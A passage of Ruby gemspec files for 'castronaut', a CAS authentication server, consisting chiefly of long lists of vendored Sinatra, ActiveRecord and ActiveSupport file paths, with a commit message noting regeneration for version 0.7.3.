"vendor/sinatra/compat/template_test.rb",
"vendor/sinatra/compat/use_in_file_templates_test.rb",
"vendor/sinatra/compat/views/foo.builder",
"vendor/sinatra/compat/views/foo.erb",
"vendor/sinatra/compat/views/foo.haml",
"vendor/sinatra/compat/views/foo.sass",
"vendor/sinatra/compat/views/foo_layout.erb",
"vendor/sinatra/compat/views/foo_layout.haml",
"vendor/sinatra/compat/views/layout_test/foo.builder",
"vendor/sinatra/compat/views/layout_test/foo.erb",
"vendor/sinatra/compat/views/layout_test/foo.haml",
"vendor/sinatra/compat/views/layout_test/foo.sass",
"vendor/sinatra/compat/views/layout_test/layout.builder",
"vendor/sinatra/compat/views/layout_test/layout.erb",
"vendor/sinatra/compat/views/layout_test/layout.haml",
"vendor/sinatra/compat/views/layout_test/layout.sass",
"vendor/sinatra/compat/views/no_layout/no_layout.builder",
"vendor/sinatra/compat/views/no_layout/no_layout.haml",
"vendor/sinatra/lib/sinatra.rb",
"vendor/sinatra/lib/sinatra/base.rb",
"vendor/sinatra/lib/sinatra/compat.rb",
"vendor/sinatra/lib/sinatra/images/404.png",
"vendor/sinatra/lib/sinatra/images/500.png",
"vendor/sinatra/lib/sinatra/main.rb",
"vendor/sinatra/lib/sinatra/test.rb",
"vendor/sinatra/lib/sinatra/test/bacon.rb",
"vendor/sinatra/lib/sinatra/test/rspec.rb",
"vendor/sinatra/lib/sinatra/test/spec.rb",
"vendor/sinatra/lib/sinatra/test/unit.rb",
"vendor/sinatra/sinatra.gemspec",
"vendor/sinatra/test/base_test.rb",
"vendor/sinatra/test/builder_test.rb",
"vendor/sinatra/test/data/reload_app_file.rb",
"vendor/sinatra/test/erb_test.rb",
"vendor/sinatra/test/filter_test.rb",
"vendor/sinatra/test/haml_test.rb",
"vendor/sinatra/test/helper.rb",
"vendor/sinatra/test/helpers_test.rb",
"vendor/sinatra/test/mapped_error_test.rb",
"vendor/sinatra/test/middleware_test.rb",
"vendor/sinatra/test/options_test.rb",
"vendor/sinatra/test/reload_test.rb",
"vendor/sinatra/test/request_test.rb",
"vendor/sinatra/test/result_test.rb",
"vendor/sinatra/test/routing_test.rb",
"vendor/sinatra/test/sass_test.rb",
"vendor/sinatra/test/sinatra_test.rb",
"vendor/sinatra/test/static_test.rb",
"vendor/sinatra/test/templates_test.rb",
"vendor/sinatra/test/views/hello.builder",
"vendor/sinatra/test/views/hello.erb",
"vendor/sinatra/test/views/hello.haml",
"vendor/sinatra/test/views/hello.sass",
"vendor/sinatra/test/views/hello.test",
"vendor/sinatra/test/views/layout2.builder",
"vendor/sinatra/test/views/layout2.erb",
"vendor/sinatra/test/views/layout2.haml",
"vendor/sinatra/test/views/layout2.test"
]
s.homepage = %q{http://github.com/relevance/castronaut}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.2}
s.summary = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.test_files = [
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb"
]
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::RubyGemsVersion) >= Gem::Version.new('1.2.0') then
else
end
else
end
end
Regenerated gemspec for version 0.7.3
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{castronaut}
s.version = "0.7.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Relevance, Inc."]
s.date = %q{2009-05-22}
s.default_executable = %q{castronaut}
s.description = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.email = %q{aaron@thinkrelevance.com}
s.executables = ["castronaut"]
s.files = [
"MIT-LICENSE",
"README.textile",
"Rakefile",
"app/config.rb",
"app/config.ru",
"app/controllers/application.rb",
"app/public/javascripts/application.js",
"app/public/javascripts/jquery.js",
"app/public/stylesheets/screen.css",
"app/views/layout.erb",
"app/views/login.erb",
"app/views/logout.erb",
"app/views/proxy_validate.erb",
"app/views/service_validate.erb",
"bin/castronaut",
"castronaut.rb",
"config/castronaut.example.yml",
"config/castronaut.sample.yml",
"config/nginx_vhost.conf",
"config/thin_config.yml",
"lib/castronaut.rb",
"lib/castronaut/adapters.rb",
"lib/castronaut/adapters/development/adapter.rb",
"lib/castronaut/adapters/development/user.rb",
"lib/castronaut/adapters/ldap/adapter.rb",
"lib/castronaut/adapters/ldap/user.rb",
"lib/castronaut/adapters/restful_authentication/adapter.rb",
"lib/castronaut/adapters/restful_authentication/user.rb",
"lib/castronaut/authentication_result.rb",
"lib/castronaut/configuration.rb",
"lib/castronaut/db/001_create_cas_database.rb",
"lib/castronaut/models/consumeable.rb",
"lib/castronaut/models/dispenser.rb",
"lib/castronaut/models/login_ticket.rb",
"lib/castronaut/models/proxy_granting_ticket.rb",
"lib/castronaut/models/proxy_ticket.rb",
"lib/castronaut/models/service_ticket.rb",
"lib/castronaut/models/ticket_granting_ticket.rb",
"lib/castronaut/presenters/login.rb",
"lib/castronaut/presenters/logout.rb",
"lib/castronaut/presenters/process_login.rb",
"lib/castronaut/presenters/proxy_validate.rb",
"lib/castronaut/presenters/service_validate.rb",
"lib/castronaut/support/sample.rb",
"lib/castronaut/ticket_result.rb",
"lib/castronaut/utilities/random_string.rb",
"spec/app/controllers/application_spec.rb",
"spec/app/controllers/db/cas.db",
"spec/app/controllers/db/cas_adapter.db",
"spec/app/controllers/log/castronaut.log",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec.opts",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb",
"vendor/activerecord/CHANGELOG",
"vendor/activerecord/README",
"vendor/activerecord/RUNNING_UNIT_TESTS",
"vendor/activerecord/Rakefile",
"vendor/activerecord/examples/associations.png",
"vendor/activerecord/install.rb",
"vendor/activerecord/lib/active_record.rb",
"vendor/activerecord/lib/active_record/aggregations.rb",
"vendor/activerecord/lib/active_record/association_preload.rb",
"vendor/activerecord/lib/active_record/associations.rb",
"vendor/activerecord/lib/active_record/associations/association_collection.rb",
"vendor/activerecord/lib/active_record/associations/association_proxy.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_association.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_polymorphic_association.rb",
"vendor/activerecord/lib/active_record/associations/has_and_belongs_to_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_through_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_through_association.rb",
"vendor/activerecord/lib/active_record/attribute_methods.rb",
"vendor/activerecord/lib/active_record/base.rb",
"vendor/activerecord/lib/active_record/calculations.rb",
"vendor/activerecord/lib/active_record/callbacks.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_pool.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_specification.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/database_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/quoting.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_definitions.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/mysql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite3_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite_adapter.rb",
"vendor/activerecord/lib/active_record/dirty.rb",
"vendor/activerecord/lib/active_record/dynamic_finder_match.rb",
"vendor/activerecord/lib/active_record/fixtures.rb",
"vendor/activerecord/lib/active_record/i18n_interpolation_deprecation.rb",
"vendor/activerecord/lib/active_record/locale/en.yml",
"vendor/activerecord/lib/active_record/locking/optimistic.rb",
"vendor/activerecord/lib/active_record/locking/pessimistic.rb",
"vendor/activerecord/lib/active_record/migration.rb",
"vendor/activerecord/lib/active_record/named_scope.rb",
"vendor/activerecord/lib/active_record/observer.rb",
"vendor/activerecord/lib/active_record/query_cache.rb",
"vendor/activerecord/lib/active_record/reflection.rb",
"vendor/activerecord/lib/active_record/schema.rb",
"vendor/activerecord/lib/active_record/schema_dumper.rb",
"vendor/activerecord/lib/active_record/serialization.rb",
"vendor/activerecord/lib/active_record/serializers/json_serializer.rb",
"vendor/activerecord/lib/active_record/serializers/xml_serializer.rb",
"vendor/activerecord/lib/active_record/test_case.rb",
"vendor/activerecord/lib/active_record/timestamp.rb",
"vendor/activerecord/lib/active_record/transactions.rb",
"vendor/activerecord/lib/active_record/validations.rb",
"vendor/activerecord/lib/active_record/version.rb",
"vendor/activerecord/lib/activerecord.rb",
"vendor/activerecord/test/assets/example.log",
"vendor/activerecord/test/assets/flowers.jpg",
"vendor/activerecord/test/cases/aaa_create_tables_test.rb",
"vendor/activerecord/test/cases/active_schema_test_mysql.rb",
"vendor/activerecord/test/cases/active_schema_test_postgresql.rb",
"vendor/activerecord/test/cases/adapter_test.rb",
"vendor/activerecord/test/cases/aggregations_test.rb",
"vendor/activerecord/test/cases/ar_schema_test.rb",
"vendor/activerecord/test/cases/associations/belongs_to_associations_test.rb",
"vendor/activerecord/test/cases/associations/callbacks_test.rb",
"vendor/activerecord/test/cases/associations/cascaded_eager_loading_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_includes_full_sti_class_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_nested_include_test.rb",
"vendor/activerecord/test/cases/associations/eager_singularization_test.rb",
"vendor/activerecord/test/cases/associations/eager_test.rb",
"vendor/activerecord/test/cases/associations/extension_test.rb",
"vendor/activerecord/test/cases/associations/has_and_belongs_to_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/inner_join_association_test.rb",
"vendor/activerecord/test/cases/associations/join_model_test.rb",
"vendor/activerecord/test/cases/associations_test.rb",
"vendor/activerecord/test/cases/attribute_methods_test.rb",
"vendor/activerecord/test/cases/base_test.rb",
"vendor/activerecord/test/cases/binary_test.rb",
"vendor/activerecord/test/cases/calculations_test.rb",
"vendor/activerecord/test/cases/callbacks_observers_test.rb",
"vendor/activerecord/test/cases/callbacks_test.rb",
"vendor/activerecord/test/cases/class_inheritable_attributes_test.rb",
"vendor/activerecord/test/cases/column_alias_test.rb",
"vendor/activerecord/test/cases/column_definition_test.rb",
"vendor/activerecord/test/cases/connection_test_firebird.rb",
"vendor/activerecord/test/cases/connection_test_mysql.rb",
"vendor/activerecord/test/cases/copy_table_test_sqlite.rb",
"vendor/activerecord/test/cases/database_statements_test.rb",
"vendor/activerecord/test/cases/datatype_test_postgresql.rb",
"vendor/activerecord/test/cases/date_time_test.rb",
"vendor/activerecord/test/cases/default_test_firebird.rb",
"vendor/activerecord/test/cases/defaults_test.rb",
"vendor/activerecord/test/cases/deprecated_finder_test.rb",
"vendor/activerecord/test/cases/dirty_test.rb",
"vendor/activerecord/test/cases/finder_respond_to_test.rb",
"vendor/activerecord/test/cases/finder_test.rb",
"vendor/activerecord/test/cases/fixtures_test.rb",
"vendor/activerecord/test/cases/helper.rb",
"vendor/activerecord/test/cases/i18n_test.rb",
"vendor/activerecord/test/cases/inheritance_test.rb",
"vendor/activerecord/test/cases/invalid_date_test.rb",
"vendor/activerecord/test/cases/json_serialization_test.rb",
"vendor/activerecord/test/cases/lifecycle_test.rb",
"vendor/activerecord/test/cases/locking_test.rb",
"vendor/activerecord/test/cases/method_scoping_test.rb",
"vendor/activerecord/test/cases/migration_test.rb",
"vendor/activerecord/test/cases/migration_test_firebird.rb",
"vendor/activerecord/test/cases/mixin_test.rb",
"vendor/activerecord/test/cases/modules_test.rb",
"vendor/activerecord/test/cases/multiple_db_test.rb",
"vendor/activerecord/test/cases/named_scope_test.rb",
"vendor/activerecord/test/cases/pk_test.rb",
"vendor/activerecord/test/cases/pooled_connections_test.rb",
"vendor/activerecord/test/cases/query_cache_test.rb",
"vendor/activerecord/test/cases/readonly_test.rb",
"vendor/activerecord/test/cases/reflection_test.rb",
"vendor/activerecord/test/cases/reload_models_test.rb",
"vendor/activerecord/test/cases/reserved_word_test_mysql.rb",
"vendor/activerecord/test/cases/sanitize_test.rb",
"vendor/activerecord/test/cases/schema_authorization_test_postgresql.rb",
"vendor/activerecord/test/cases/schema_dumper_test.rb",
"vendor/activerecord/test/cases/schema_test_postgresql.rb",
"vendor/activerecord/test/cases/serialization_test.rb",
"vendor/activerecord/test/cases/synonym_test_oracle.rb",
"vendor/activerecord/test/cases/transactions_test.rb",
"vendor/activerecord/test/cases/unconnected_test.rb",
"vendor/activerecord/test/cases/validations_i18n_test.rb",
"vendor/activerecord/test/cases/validations_test.rb",
"vendor/activerecord/test/cases/xml_serialization_test.rb",
"vendor/activerecord/test/config.rb",
"vendor/activerecord/test/connections/native_db2/connection.rb",
"vendor/activerecord/test/connections/native_firebird/connection.rb",
"vendor/activerecord/test/connections/native_frontbase/connection.rb",
"vendor/activerecord/test/connections/native_mysql/connection.rb",
"vendor/activerecord/test/connections/native_openbase/connection.rb",
"vendor/activerecord/test/connections/native_oracle/connection.rb",
"vendor/activerecord/test/connections/native_postgresql/connection.rb",
"vendor/activerecord/test/connections/native_sqlite/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/in_memory_connection.rb",
"vendor/activerecord/test/connections/native_sybase/connection.rb",
"vendor/activerecord/test/fixtures/accounts.yml",
"vendor/activerecord/test/fixtures/all/developers.yml",
"vendor/activerecord/test/fixtures/all/people.csv",
"vendor/activerecord/test/fixtures/all/tasks.yml",
"vendor/activerecord/test/fixtures/author_addresses.yml",
"vendor/activerecord/test/fixtures/author_favorites.yml",
"vendor/activerecord/test/fixtures/authors.yml",
"vendor/activerecord/test/fixtures/binaries.yml",
"vendor/activerecord/test/fixtures/books.yml",
"vendor/activerecord/test/fixtures/categories.yml",
"vendor/activerecord/test/fixtures/categories/special_categories.yml",
"vendor/activerecord/test/fixtures/categories/subsubdir/arbitrary_filename.yml",
"vendor/activerecord/test/fixtures/categories_ordered.yml",
"vendor/activerecord/test/fixtures/categories_posts.yml",
"vendor/activerecord/test/fixtures/categorizations.yml",
"vendor/activerecord/test/fixtures/clubs.yml",
"vendor/activerecord/test/fixtures/comments.yml",
"vendor/activerecord/test/fixtures/companies.yml",
"vendor/activerecord/test/fixtures/computers.yml",
"vendor/activerecord/test/fixtures/courses.yml",
"vendor/activerecord/test/fixtures/customers.yml",
"vendor/activerecord/test/fixtures/developers.yml",
"vendor/activerecord/test/fixtures/developers_projects.yml",
"vendor/activerecord/test/fixtures/edges.yml",
"vendor/activerecord/test/fixtures/entrants.yml",
"vendor/activerecord/test/fixtures/fixture_database.sqlite3",
"vendor/activerecord/test/fixtures/fixture_database_2.sqlite3",
"vendor/activerecord/test/fixtures/fk_test_has_fk.yml",
"vendor/activerecord/test/fixtures/fk_test_has_pk.yml",
"vendor/activerecord/test/fixtures/funny_jokes.yml",
"vendor/activerecord/test/fixtures/items.yml",
"vendor/activerecord/test/fixtures/jobs.yml",
"vendor/activerecord/test/fixtures/legacy_things.yml",
"vendor/activerecord/test/fixtures/mateys.yml",
"vendor/activerecord/test/fixtures/members.yml",
"vendor/activerecord/test/fixtures/memberships.yml",
"vendor/activerecord/test/fixtures/minimalistics.yml",
"vendor/activerecord/test/fixtures/mixed_case_monkeys.yml",
"vendor/activerecord/test/fixtures/mixins.yml",
"vendor/activerecord/test/fixtures/movies.yml",
"vendor/activerecord/test/fixtures/naked/csv/accounts.csv",
"vendor/activerecord/test/fixtures/naked/yml/accounts.yml",
"vendor/activerecord/test/fixtures/naked/yml/companies.yml",
"vendor/activerecord/test/fixtures/naked/yml/courses.yml",
"vendor/activerecord/test/fixtures/organizations.yml",
"vendor/activerecord/test/fixtures/owners.yml",
"vendor/activerecord/test/fixtures/parrots.yml",
"vendor/activerecord/test/fixtures/parrots_pirates.yml",
"vendor/activerecord/test/fixtures/people.yml",
"vendor/activerecord/test/fixtures/pets.yml",
"vendor/activerecord/test/fixtures/pirates.yml",
"vendor/activerecord/test/fixtures/posts.yml",
"vendor/activerecord/test/fixtures/price_estimates.yml",
"vendor/activerecord/test/fixtures/projects.yml",
"vendor/activerecord/test/fixtures/readers.yml",
"vendor/activerecord/test/fixtures/references.yml",
"vendor/activerecord/test/fixtures/reserved_words/distinct.yml",
"vendor/activerecord/test/fixtures/reserved_words/distincts_selects.yml",
"vendor/activerecord/test/fixtures/reserved_words/group.yml",
"vendor/activerecord/test/fixtures/reserved_words/select.yml",
"vendor/activerecord/test/fixtures/reserved_words/values.yml",
"vendor/activerecord/test/fixtures/ships.yml",
"vendor/activerecord/test/fixtures/sponsors.yml",
"vendor/activerecord/test/fixtures/subscribers.yml",
"vendor/activerecord/test/fixtures/subscriptions.yml",
"vendor/activerecord/test/fixtures/taggings.yml",
"vendor/activerecord/test/fixtures/tags.yml",
"vendor/activerecord/test/fixtures/tasks.yml",
"vendor/activerecord/test/fixtures/topics.yml",
"vendor/activerecord/test/fixtures/treasures.yml",
"vendor/activerecord/test/fixtures/vertices.yml",
"vendor/activerecord/test/fixtures/warehouse-things.yml",
"vendor/activerecord/test/migrations/broken/100_migration_that_raises_exception.rb",
"vendor/activerecord/test/migrations/decimal/1_give_me_big_numbers.rb",
"vendor/activerecord/test/migrations/duplicate/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/duplicate/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/duplicate/3_foo.rb",
"vendor/activerecord/test/migrations/duplicate/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507052938_chunky.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507053028_chunky.rb",
"vendor/activerecord/test/migrations/interleaved/pass_1/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/2_i_raise_on_down.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/missing/1000_people_have_middle_names.rb",
"vendor/activerecord/test/migrations/missing/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/missing/3_we_need_reminders.rb",
"vendor/activerecord/test/migrations/missing/4_innocent_jointable.rb",
"vendor/activerecord/test/migrations/valid/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/valid/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/valid/3_innocent_jointable.rb",
"vendor/activerecord/test/models/author.rb",
"vendor/activerecord/test/models/auto_id.rb",
"vendor/activerecord/test/models/binary.rb",
"vendor/activerecord/test/models/book.rb",
"vendor/activerecord/test/models/categorization.rb",
"vendor/activerecord/test/models/category.rb",
"vendor/activerecord/test/models/citation.rb",
"vendor/activerecord/test/models/club.rb",
"vendor/activerecord/test/models/column_name.rb",
"vendor/activerecord/test/models/comment.rb",
"vendor/activerecord/test/models/company.rb",
"vendor/activerecord/test/models/company_in_module.rb",
"vendor/activerecord/test/models/computer.rb",
"vendor/activerecord/test/models/contact.rb",
"vendor/activerecord/test/models/course.rb",
"vendor/activerecord/test/models/customer.rb",
"vendor/activerecord/test/models/default.rb",
"vendor/activerecord/test/models/developer.rb",
"vendor/activerecord/test/models/edge.rb",
"vendor/activerecord/test/models/entrant.rb",
"vendor/activerecord/test/models/guid.rb",
"vendor/activerecord/test/models/item.rb",
"vendor/activerecord/test/models/job.rb",
"vendor/activerecord/test/models/joke.rb",
"vendor/activerecord/test/models/keyboard.rb",
"vendor/activerecord/test/models/legacy_thing.rb",
"vendor/activerecord/test/models/matey.rb",
"vendor/activerecord/test/models/member.rb",
"vendor/activerecord/test/models/member_detail.rb",
"vendor/activerecord/test/models/membership.rb",
"vendor/activerecord/test/models/minimalistic.rb",
"vendor/activerecord/test/models/mixed_case_monkey.rb",
"vendor/activerecord/test/models/movie.rb",
"vendor/activerecord/test/models/order.rb",
"vendor/activerecord/test/models/organization.rb",
"vendor/activerecord/test/models/owner.rb",
"vendor/activerecord/test/models/parrot.rb",
"vendor/activerecord/test/models/person.rb",
"vendor/activerecord/test/models/pet.rb",
"vendor/activerecord/test/models/pirate.rb",
"vendor/activerecord/test/models/post.rb",
"vendor/activerecord/test/models/price_estimate.rb",
"vendor/activerecord/test/models/project.rb",
"vendor/activerecord/test/models/reader.rb",
"vendor/activerecord/test/models/reference.rb",
"vendor/activerecord/test/models/reply.rb",
"vendor/activerecord/test/models/ship.rb",
"vendor/activerecord/test/models/sponsor.rb",
"vendor/activerecord/test/models/subject.rb",
"vendor/activerecord/test/models/subscriber.rb",
"vendor/activerecord/test/models/subscription.rb",
"vendor/activerecord/test/models/tag.rb",
"vendor/activerecord/test/models/tagging.rb",
"vendor/activerecord/test/models/task.rb",
"vendor/activerecord/test/models/topic.rb",
"vendor/activerecord/test/models/treasure.rb",
"vendor/activerecord/test/models/vertex.rb",
"vendor/activerecord/test/models/warehouse_thing.rb",
"vendor/activerecord/test/schema/mysql_specific_schema.rb",
"vendor/activerecord/test/schema/postgresql_specific_schema.rb",
"vendor/activerecord/test/schema/schema.rb",
"vendor/activerecord/test/schema/schema2.rb",
"vendor/activerecord/test/schema/sqlite_specific_schema.rb",
"vendor/activesupport/CHANGELOG",
"vendor/activesupport/README",
"vendor/activesupport/lib/active_support.rb",
"vendor/activesupport/lib/active_support/base64.rb",
"vendor/activesupport/lib/active_support/basic_object.rb",
"vendor/activesupport/lib/active_support/buffered_logger.rb",
"vendor/activesupport/lib/active_support/cache.rb",
"vendor/activesupport/lib/active_support/cache/compressed_mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/drb_store.rb",
"vendor/activesupport/lib/active_support/cache/file_store.rb",
"vendor/activesupport/lib/active_support/cache/mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/memory_store.rb",
"vendor/activesupport/lib/active_support/cache/synchronized_memory_store.rb",
"vendor/activesupport/lib/active_support/callbacks.rb",
"vendor/activesupport/lib/active_support/core_ext.rb",
"vendor/activesupport/lib/active_support/core_ext/array.rb",
"vendor/activesupport/lib/active_support/core_ext/array/access.rb",
"vendor/activesupport/lib/active_support/core_ext/array/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/array/extract_options.rb",
"vendor/activesupport/lib/active_support/core_ext/array/grouping.rb",
"vendor/activesupport/lib/active_support/core_ext/array/random_access.rb",
"vendor/activesupport/lib/active_support/core_ext/base64.rb",
"vendor/activesupport/lib/active_support/core_ext/base64/encoding.rb",
"vendor/activesupport/lib/active_support/core_ext/benchmark.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/blank.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi/escape_skipping_slashes.rb",
"vendor/activesupport/lib/active_support/core_ext/class.rb",
"vendor/activesupport/lib/active_support/core_ext/class/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/class/delegating_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/inheritable_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/removal.rb",
"vendor/activesupport/lib/active_support/core_ext/date.rb",
"vendor/activesupport/lib/active_support/core_ext/date/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/date/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/duplicable.rb",
"vendor/activesupport/lib/active_support/core_ext/enumerable.rb",
"vendor/activesupport/lib/active_support/core_ext/exception.rb",
"vendor/activesupport/lib/active_support/core_ext/file.rb",
"vendor/activesupport/lib/active_support/core_ext/file/atomic.rb",
"vendor/activesupport/lib/active_support/core_ext/float.rb",
"vendor/activesupport/lib/active_support/core_ext/float/rounding.rb",
"vendor/activesupport/lib/active_support/core_ext/float/time.rb",
"vendor/activesupport/lib/active_support/core_ext/hash.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/deep_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/diff.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/except.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/indifferent_access.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/keys.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/reverse_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/slice.rb",
"vendor/activesupport/lib/active_support/core_ext/integer.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/even_odd.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/time.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/agnostics.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/daemonizing.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/debugger.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/reporting.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/requires.rb",
"vendor/activesupport/lib/active_support/core_ext/load_error.rb",
"vendor/activesupport/lib/active_support/core_ext/logger.rb",
"vendor/activesupport/lib/active_support/core_ext/module.rb",
"vendor/activesupport/lib/active_support/core_ext/module/aliasing.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_accessor_with_default.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_internal.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/module/delegation.rb",
"vendor/activesupport/lib/active_support/core_ext/module/inclusion.rb",
"vendor/activesupport/lib/active_support/core_ext/module/introspection.rb",
"vendor/activesupport/lib/active_support/core_ext/module/loading.rb",
"vendor/activesupport/lib/active_support/core_ext/module/model_naming.rb",
"vendor/activesupport/lib/active_support/core_ext/module/synchronization.rb",
"vendor/activesupport/lib/active_support/core_ext/name_error.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/bytes.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/time.rb",
"vendor/activesupport/lib/active_support/core_ext/object.rb",
"vendor/activesupport/lib/active_support/core_ext/object/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/object/extending.rb",
"vendor/activesupport/lib/active_support/core_ext/object/instance_variables.rb",
